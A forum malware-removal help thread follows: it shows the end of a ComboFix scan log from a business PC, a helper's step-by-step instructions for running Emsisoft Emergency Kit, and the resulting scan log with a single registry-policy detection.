2014-09-01 05:28 . 2010-06-24 16:33    23256    ----a-w-    c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-16 07:07 . 2014-01-22 10:52    99218768    ----a-w-    c:\windows\system32\MRT.exe
2014-08-05 13:20 . 2010-11-21 03:27    270496    ------w-    c:\windows\system32\MpSigStub.exe
2014-07-31 15:08 . 2014-07-31 15:08    169544    ----a-w-    c:\windows\system32\g2ax_credential_provider64_715.dll
2014-06-18 02:18 . 2014-07-10 06:32    692736    ----a-w-    c:\windows\system32\osk.exe
2014-06-18 01:51 . 2014-07-10 06:32    646144    ----a-w-    c:\windows\SysWow64\osk.exe
2014-06-06 10:10 . 2014-07-10 06:32    624128    ----a-w-    c:\windows\system32\qedit.dll
2014-06-06 09:44 . 2014-07-10 06:32    509440    ----a-w-    c:\windows\SysWow64\qedit.dll
2014-06-05 14:45 . 2014-07-10 06:32    1460736    ----a-w-    c:\windows\system32\lsasrv.dll
2014-06-05 14:26 . 2014-07-10 06:32    22016    ----a-w-    c:\windows\SysWow64\secur32.dll
2014-06-05 14:25 . 2014-07-10 06:32    96768    ----a-w-    c:\windows\SysWow64\sspicli.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"BCSSync"="c:\program files (x86)\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 89184]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Conversion to PDF with ScanSnap Organizer.lnk - c:\program files (x86)\PFU\ScanSnap\Organizer\PfuSsOrgOcrChk.exe [2014-7-31 24576]
Intuit Data Protect.lnk - c:\program files (x86)\Common Files\Intuit\DataProtect\IntuitDataProtect.exe /Startup [2014-6-26 6306104]
QuickBooks_Standard_21.lnk - c:\program files (x86)\Intuit1\QuickBooks 2014\QBW32.EXE -silent [2014-6-26 1215816]
ScanSnap Manager.lnk - c:\program files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe [2013-8-19 1163264]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
R2 CLKMSVC10_9EC60124;CyberLink Product - 2013/08/12 10:54;c:\program files (x86)\CyberLink\PowerDVD9\NavFilter\kmsvc.exe;c:\program files (x86)\CyberLink\PowerDVD9\NavFilter\kmsvc.exe [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 RoxWatch12;Roxio Hard Drive Watcher 12;c:\program files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatch12OEM.exe;c:\program files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxWatch12OEM.exe [x]
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys;c:\windows\SYSNATIVE\drivers\dmvsc.sys [x]
R3 EtronHub3;Etron USB 3.0 Extensible Hub Driver;c:\windows\System32\Drivers\EtronHub3.sys;c:\windows\SYSNATIVE\Drivers\EtronHub3.sys [x]
R3 EtronSTOR;Etron Enhance USB BOT/UASP Mass Storage Driver;c:\windows\System32\Drivers\EtronSTOR.sys;c:\windows\SYSNATIVE\Drivers\EtronSTOR.sys [x]
R3 EtronXHCI;Etron USB 3.0 Extensible Host Controller Driver;c:\windows\System32\Drivers\EtronXHCI.sys;c:\windows\SYSNATIVE\Drivers\EtronXHCI.sys [x]
R3 icvmlt32;icvmlt32;c:\icverify\ICWin420\PCVXWinServiceManager.exe icvmlt32;c:\icverify\ICWin420\PCVXWinServiceManager.exe icvmlt32 [x]
R3 nusb3hub;Renesas Electronics USB 3.0 Hub Driver;c:\windows\system32\drivers\nusb3hub.sys;c:\windows\SYSNATIVE\drivers\nusb3hub.sys [x]
R3 nusb3xhc;Renesas Electronics USB 3.0 Host Controller Driver;c:\windows\system32\drivers\nusb3xhc.sys;c:\windows\SYSNATIVE\drivers\nusb3xhc.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 RoxMediaDB12OEM;RoxMediaDB12OEM;c:\program files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxMediaDB12OEM.exe;c:\program files (x86)\Common Files\Roxio Shared\OEM\12.0\SharedCOM\RoxMediaDB12OEM.exe [x]
R3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
R3 SNXPPAMD;SUNIX Parallel Port Driver;c:\windows\system32\drivers\snxppamd.sys;c:\windows\SYSNATIVE\drivers\snxppamd.sys [x]
R3 SNXPSAMD;SUNIX Serial Port Driver;c:\windows\system32\drivers\snxpsamd.sys;c:\windows\SYSNATIVE\drivers\snxpsamd.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S1 eamonm;eamonm;c:\windows\system32\DRIVERS\eamonm.sys;c:\windows\SYSNATIVE\DRIVERS\eamonm.sys [x]
S1 ehdrv;ehdrv;c:\windows\system32\DRIVERS\ehdrv.sys;c:\windows\SYSNATIVE\DRIVERS\ehdrv.sys [x]
S2 ekrn;ESET Service;c:\program files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe;c:\program files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [x]
S2 epfwwfpr;epfwwfpr;c:\windows\system32\DRIVERS\epfwwfpr.sys;c:\windows\SYSNATIVE\DRIVERS\epfwwfpr.sys [x]
S2 GoToAssist Remote Support Customer;GoToAssist Remote Support Customer;c:\program files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe Start=service;c:\program files (x86)\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe Start=service [x]
S2 ICVTnsServer;ICVTnsServer;c:\icverify\ICWin420\PCVXWinServiceManager.exe ICVTnsServer;c:\icverify\ICWin420\PCVXWinServiceManager.exe ICVTnsServer [x]
S2 JCard Service;JCard Service;c:\icverify\ICWin420\Jcard\JCardService.exe;c:\icverify\ICWin420\Jcard\JCardService.exe [x]
S2 PCVXFileMonitor;PCVXFileMonitor;c:\icverify\ICWin420\PCVXWinServiceManager.exe PCVXFileMonitor;c:\icverify\ICWin420\PCVXWinServiceManager.exe PCVXFileMonitor [x]
S2 QBVSS;QBIDPService;c:\program files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe;c:\program files (x86)\Common Files\Intuit\DataProtect\QBIDPService.exe [x]
S3 IntcDAud;Intel® Display Audio;c:\windows\system32\DRIVERS\IntcDAud.sys;c:\windows\SYSNATIVE\DRIVERS\IntcDAud.sys [x]
S3 PaniniUSB;PaniniUSB;c:\windows\system32\DRIVERS\PaniniUSB.sys;c:\windows\SYSNATIVE\DRIVERS\PaniniUSB.sys [x]
.
.
--- Other Services/Drivers In Memory ---
.
*Deregistered* - CLKMDRV10_9EC60124
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-08-15 00:35    1104200    ----a-w-    c:\program files (x86)\Google\Chrome\Application\36.0.1985.143\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-09-01 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-01-27 20:03]
.
2014-09-01 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2014-01-27 20:03]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2012-04-25 170264]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2012-04-25 398616]
"Persistence"="c:\windows\system32\igfxpers.exe" [2012-04-25 439064]
"egui"="c:\program files\ESET\ESET NOD32 Antivirus\egui.exe" [2013-03-21 6330568]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = https://www.google.com/
mLocal Page = c:\windows\SysWOW64\blank.htm
IE: E&xport to Microsoft Excel - c:\progra~2\MICROS~1\Office12\EXCEL.EXE/3000
Trusted Zone: agentnet.com
Trusted Zone: amadeus.com
Trusted Zone: amadeus.com\content
Trusted Zone: amadeus.com\diagnostic
Trusted Zone: amadeus.net
Trusted Zone: amadeuscruise.com
Trusted Zone: amadeusferry.com\*
Trusted Zone: amadeusproweb.com
Trusted Zone: amadeusvista.com
Trusted Zone: amadeusvista.com\*.1a
Trusted Zone: amadeusvista.com\certificates
Trusted Zone: chase.com
Trusted Zone: 128.110\50.192
Trusted Zone: 228.193\50.243
Trusted Zone: amadeus.com\content
Trusted Zone: amadeus.net\content.1a
Trusted Zone: amadeusproweb.com
Trusted Zone: amadeusvista.com
Trusted Zone: amadeusvista.com\Muc.http.farm6.software
Trusted Zone: amadeusvista.com\Muc.http.farm8.software
Trusted Zone: amadeusvista.com\Muc.https.farm11.software
Trusted Zone: amadeusvista.com\Muc.https.farm5.software
TCP: DhcpNameServer = 208.67.222.222 208.67.220.220 4.2.2.2
DPF: {3839EEB1-774E-40AC-BB55-1FFF0F09FFBC} - hxxp://extranets.us.amadeus.com/techservices/documents/SoftwareDistribution/Amadeus-CS-MIA/AmadeusRailKeyAgent/v1003/install.cab
DPF: {5CCB8990-66EF-4466-B051-CD27FA3821DF} - hxxp://content.amadeus.com/Scripts/AmadeusNALibrary/V2.0.0/install.cab
DPF: {9D96A8C3-A6DA-47CC-BD44-A968B60C01EB} - hxxp://extranet.us.amadeus.com/techservices/documents/softwaredistribution/amadeus-cs-mia/FXG/v1.2.3/MasterPricerFXM.cab
DPF: {F96020DD-C373-44A0-82B6-064EF0AEEAE3} - hxxp://certificates.amadeusvista.com/sgwadmin/RegSiteTools.cab
FF - ProfilePath - c:\users\FD-2\AppData\Roaming\Mozilla\Firefox\Profiles\31sv5obh.default\
FF - prefs.js: browser.startup.homepage - hxxp://google.com/
.
- - - - ORPHANS REMOVED - - - -
.
Toolbar-Locked - (no file)
HKLM_Wow6432Node-ActiveSetup-{2D46B6DC-2207-486B-B523-A557E6D54B47} - start
Toolbar-Locked - (no file)
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_11_8_800_94_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_11_8_800_94_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_8_800_94_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_11_8_800_94_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_8_800_94.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.11"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_8_800_94.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_8_800_94.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_11_8_800_94.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B9A09F18-45AB-4F09-A117-A4ADDA8FA8C8}]
@Denied: (A) (Everyone)
"Solution"="{36eb6792-3a29-43b3-8cd0-f67d266fb426}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane\0]
"Key"="ActionsPane"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\8.0\\ActionsPane.xsd"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-09-01  14:25:34
ComboFix-quarantined-files.txt  2014-09-01 18:25
.
Pre-Run: 411,490,344,960 bytes free
Post-Run: 420,221,435,904 bytes free
.
- - End Of File - - 2C527EAA0D863A40358FD0BE0FBA23EF
A36C5E4F47E84449FF07ED3517B43A31
 



#10 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:45 AM

Posted 01 September 2014 - 02:04 PM

There are no miracles in malware removal.. :)

The following step should be done on both computers:


Download Emsisoft Emergency Kit and save it to your desktop. Double click on EmsisoftEmergencyKit.exe to extract its contents and create a shortcut on the desktop. Leave all settings as they are and click Accept & Extract. A folder named EEK will be created in the root of the drive (usually c:\). .
  • After extraction an Emsisoft Emergency Kit window will open. Under "Run Directly:" click Emergency Kit Scanner.
  • When asked to run an online update, click Yes.
  • When the update is finished, click the Back to Security Status link in the left corner. On the main screen click the Scan Now button.
  • Select the Full Scan option and click the SCAN button.
  • When the scan is finished click the Quarantine selected objects button. Note, this option is only available if malicious objects were detected during the scan.
  • Click the View Report button and in the Reports window double-click on the most recent log. Note, logs are named as follows: a2scan_<date>-<time>.txt.
  • Copy/paste the report contents in your next reply.


#11 litepc

litepc
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:45 AM

Posted 01 September 2014 - 02:48 PM

Ok: Should i quarantine even the ones that its notes NO RISK?



#12 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:45 AM

Posted 01 September 2014 - 02:50 PM

In fact it would be better to quarantine none of found threats and just post the log.

#13 litepc

litepc
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:45 AM

Posted 01 September 2014 - 02:53 PM

ok... so i assume it will create a log even if i dont quarantine correct?

 

Doing it now to both desk tops



#14 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:45 AM

Posted 01 September 2014 - 03:02 PM

Yes, just skip the point with "Quarantine selected objects" in my instructions.

#15 litepc

litepc
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:45 AM

Posted 01 September 2014 - 03:05 PM

Ok here is the EEK  log file for PC #1

 

Emsisoft Emergency Kit - Version 9.0
Last update: 9/1/2014 3:33:17 PM
User account: SFTFD-2\FD-2

Scan settings:

Scan type: Full Scan
Objects: Rootkits, Memory, Traces, C:\

Detect PUPs: On
Scan archives: On
ADS Scan: On
File extension filter: Off
Advanced caching: On
Direct disk access: Off

Scan start:    9/1/2014 3:33:50 PM
Value: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM -> DISABLEREGISTRYTOOLS     detected: Setting.DisableRegistryTools (A)

Scanned    202894
Found    1

Scan end:    9/1/2014 4:03:25 PM
Scan time:    0:29:35
 






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users